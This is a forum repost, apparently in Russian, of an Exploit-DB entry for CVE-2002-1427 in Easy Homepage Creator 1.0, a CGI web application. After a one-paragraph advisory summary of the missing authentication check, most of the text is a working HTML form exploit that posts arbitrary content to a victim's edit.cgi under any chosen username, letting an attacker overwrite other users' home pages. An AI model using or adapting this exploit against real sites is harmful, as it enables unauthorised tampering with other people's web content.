Exploit Ben Chivers Easy Homepage Creator 1.0 - File Modification

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
21658
Проверка EDB
  1. Пройдено
Автор
AREK SUROBOYO
Тип уязвимости
WEBAPPS
Платформа
CGI
CVE
cve-2002-1427
Дата публикации
2002-07-29
HTML:
source: https://www.securityfocus.com/bid/5340/info

The vulnerability has been reported for Easy Homepage Creator. It is possible for an atttacker to modify any user's home page. The vulnerability is the result of Homepage Creator failing to properly authenticate users who wish to edit home pages. 

<html><center>
<h1>Easy Homepage Creator Vulnerability</h1>
<table border=0 cellpadding=2 cellspacing=1 width="90%">
<FORM method="POST" name=edit action="http://victim/homepage/edit.cgi">
Username: <input name="username"><br>
You can edit other user homepage below :
<textarea rows="17" id="homepage_edit" name="homepage_edit" cols="88">
Please type your messages in here.
&lt;/textarea&gt;
<tr>
<td class=top>
<input class=button type="submit" value="Edit Homepage" name="edit_homepage"></td>
</tr>
</FORM>
</table>
</html>
 
Источник
www.exploit-db.com

Похожие темы